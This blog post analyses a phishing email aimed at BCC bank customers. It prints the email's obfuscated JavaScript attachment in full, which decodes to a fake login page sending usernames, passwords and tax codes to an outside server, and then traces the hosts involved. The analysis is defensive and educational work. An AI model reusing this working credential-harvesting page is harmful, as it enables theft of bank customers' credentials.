Phishing against BCC bank

In this post I am going to point out a real case of phishing against an italian bank, BCC (Banca di Credito Coperativo). Today I have received a well written mail to my university account, it says:

The body obviously is in italian and it is also good from a sintax point of view, the sender is ufficiocentral@sef.bcc.it, an address very similar to ufficiocentrale@sef.bcc.it (already blacklisted by www.anti-phishing.it). In addition it has an HTML attachment, in fact the mail asks to the customers to update their profiles otherwise the bank threatens to freeze the account. Now let’s focus out attention on the attachment:

<Script Language='Javascript'>
<!--
document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%75%74%66%2D%38%22%20%2F%3E%0A%20%20%3C%74%69%74%6C%65%3E%42%61%6E%63%61%20%64%69%20%43%72%65%64%69%74%6F%20%43%6F%6F%70%65%72%61%74%69%76%6F%20%7C%20%4C%6F%67%69%6E%3C%2F%74%69%74%6C%65%3E%0A%20%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%62%63%63%64%65%67%6C%69%75%6C%69%76%69%2E%69%74%2F%74%65%6D%70%6C%61%74%65%73%2F%70%77%63%2D%6D%75%73%69%63%2F%63%73%73%2F%74%65%6D%70%6C%61%74%65%2E%63%73%73%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%20%2F%3E%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%0A%3C%74%61%62%6C%65%20%62%6F%72%64%65%72%3D%22%30%22%20%20%63%65%6C%6C%70%61%64%64%69%6E%67%3D%22%34%22%20%63%65%6C%6C%73%70%61%63%69%6E%67%3D%22%30%22%20%63%6C%61%73%73%3D%22%63%6F%6E%74%65%6E%74%70%61%6E%65%22%3E%0A%3C%74%72%3E%0A%09%3C%74%64%20%63%6F%6C%73%70%61%6E%3D%22%32%22%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%6F%6D%70%6F%6E%65%6E%74%68%65%61%64%69%6E%67%22%3E%0A%09%09%09%3C%63%65%6E%74%65%72%3E%41%72%65%61%20%72%69%73%65%72%76%61%74%61%20%28%4C%6F%67%69%6E%29%09%09%3C%2F%63%65%6E%74%65%72%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%3E%0A%09%09%09%09%09%09%09%09%3C%2F%64%69%76%3E%0A%20%0A%09%3C%2F%74%64%3E%0A%3C%2F%74%72%3E%0A%3C%54%52%3E%0A%3C%54%44%3E%3C%49%4D%47%20%53%52%43%3D%22%68%74%74%70%3A%2F%2F%63%63%32%30%30%30%2E%6F%72%2E%6B%72%2F%62%62%73%2F%64%61%74%61%2F%42%43%43%2E%6A%70%67%22%20%41%4C%54%3D%22%62%63%63%22%20%77%65%69%67%74%68%3D%22%32%34%31%70%78%22%20%77%69%64%74%68%3D%22%35%33%39%70%78%22%3E%0A%20%0A%3C%2F%54%44%3E%0A%3C%54%44%20%52%4F%57%53%50%41%4E%3D%22%32%22%3E%3C%66%69%65%6C%64%73%65%74%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%22%3E%0A%20%20%0A%20%0A%20%0A%20%0A%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%38%37%2E%32%33%36%2E%31%36%2E%36%36%2F%2E%73%65%72%76%69%7A%69%5F%63%6C%69%65%6E%74%69%2F%73%65%72%76%69%7A%69%5F%63%6C%69%65%6E%74%69%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%20%6E%61%6D%65%3D%22%63%6F%6D%2D%6C%6F%67%69%6E%22%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69%6E%22%3E%0A%09%3C%70%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69%6E%2D%75%73%65%72%6E%61%6D%65%22%3E%0A%09%09%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%75%73%65%72%6E%61%6D%65%22%3E%43%6F%64%69%63%65%20%75%74%65%6E%74%65%3A%3C%2F%6C%61%62%65%6C%3E%0A%09%09%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%75%73%65%72%6E%61%6D%65%22%20%69%64%3D%22%75%73%65%72%6E%61%6D%65%22%20%74%79%70%65%3D%22%74%65%78%74%22%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%62%6F%78%22%20%61%6C%74%3D%22%75%73%65%72%6E%61%6D%65%22%20%73%69%7A%65%3D%22%31%38%22%20%2F%3E%0A%09%3C%2F%70%3E%0A%09%3C%70%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69%6E%2D%70%61%73%73%77%6F%72%64%22%3E%0A%20%0A%09%09%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%70%61%73%73%77%64%22%3E%50%61%73%73%77%6F%72%64%3A%3C%2F%6C%61%62%65%6C%3E%0A%09%09%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%69%64%3D%22%70%61%73%73%77%64%22%20%6E%61%6D%65%3D%22%70%61%73%73%77%6F%72%64%22%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%62%6F%78%22%20%73%69%7A%65%3D%22%31%38%22%20%61%6C%74%3D%22%70%61%73%73%77%6F%72%64%22%20%2F%3E%0A%09%3C%2F%70%3E%0A%3C%70%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69%6E%2D%70%61%73%73%77%6F%72%64%22%3E%0A%20%0A%09%09%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%70%61%73%73%77%64%22%3E%50%61%73%73%77%6F%72%64%20%44%69%73%70%6F%73%69%74%69%76%61%3A%3C%2F%6C%61%62%65%6C%3E%0A%09%09%09%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%69%64%3D%22%70%61%73%73%77%64%22%20%6E%61%6D%65%3D%22%64%69%61%22%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%62%6F%78%22%20%73%69%7A%65%3D%22%31%38%22%20%61%6C%74%3D%22%70%61%73%73%77%6F%72%64%22%20%2F%3E%0A%09%3C%2F%70%3E%0A%20%0A%3C%70%20%69%64%3D%22%63%6F%6D%2D%66%6F%72%6D%2D%6C%6F%67%69%6E%2D%70%61%73%73%77%6F%72%64%22%3E%0A%20%0A%09%09%3C%6C%61%62%65%6C%20%66%6F%72%3D%22%70%61%73%73%77%64%22%3E%43%2E%46%2F%50%2E%49%56%41%3A%3C%2F%6C%61%62%65%6C%3E%0A%09%09%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%26%6E%62%73%70%3B%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%69%64%3D%22%63%6F%64%69%63%65%22%20%6E%61%6D%65%3D%22%63%6F%64%69%63%65%22%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%62%6F%78%22%20%73%69%7A%65%3D%22%31%38%22%20%61%6C%74%3D%22%70%61%73%73%77%6F%72%64%22%20%2F%3E%0A%09%3C%2F%70%3E%0A%20%0A%20%0A%20%0A%09%09%3C%62%72%3E%3C%64%69%76%20%61%6C%69%67%6E%3D%22%72%69%67%68%74%22%3E%0A%09%09%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%6E%61%6D%65%3D%22%53%75%62%6D%69%74%22%20%63%6C%61%73%73%3D%22%62%75%74%74%6F%6E%22%20%76%61%6C%75%65%3D%22%4C%6F%67%69%6E%22%20%2F%3E%3C%62%72%3E%0A%20%0A%20%0A%20%0A%26%63%6F%70%79%3B%20%20%42%61%6E%63%68%65%20%64%69%20%43%72%65%64%69%74%6F%20%43%6F%6F%70%65%72%61%74%69%76%6F%20%0A%3C%2F%74%64%3E%0A%20%0A%3C%2F%66%69%65%6C%64%73%65%74%3E%0A%20%0A%20%20%0A%20%0A%3C%2F%54%41%42%4C%45%3E%20'));
//-->
</Script>

As we can see it is a javascript script which uses obfuscation. In order to understand what it does we will use malzilla, and we obtain an html page:

Here we have to analyze the following addresses:

– hxxp://www.bccdegliulivi.it
– hxxp://cc2000.or.kr
– hxxp://87.236.16.66

The first one is used to have a good and believable template (it is a legitimate site) in fact it imports the CSS, and it is a clever idea to trick an unware user. The second one is a korean site from which the BCC logo is loaded and it is weird that it is a korean one. The last address is russian and it calls a PHP script (/.servizi_clienti/servizi_clienti.php) to process the submitted data and grab the user account. Fortunately the path above is not reachable but the main site (87.236.16.66) is up (ParkedEU it seems a web hosting company), let’s dig a bit:

IP Location: Russian Federation Moscow Regional Educational Information
Centre Resolve Host: parkedeu.com

Guessing the nature of the russian site: the site has been compromised and used to host malicious services or in the worst hypothesis it belongs to some criminal organizations. Going one step further we know that the Autonomous System (AS) of this site is AS25519 and we have no result in http://www.maliciousnetworks.org/chart.php?as=25519 , in addition the address is also not found using http://amada.abuse.ch/?search=87.236.16.66 thus probably it is only a compromised site. Remembering that the path of PHP script is no longer available maybe the machine has been reclaimed and the threat is vanished.
Let’s conclude this brief entry saying to pay attention to mails that apparently come from banks, in this case we have seen how the mail is well written and believable to a unaware user.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s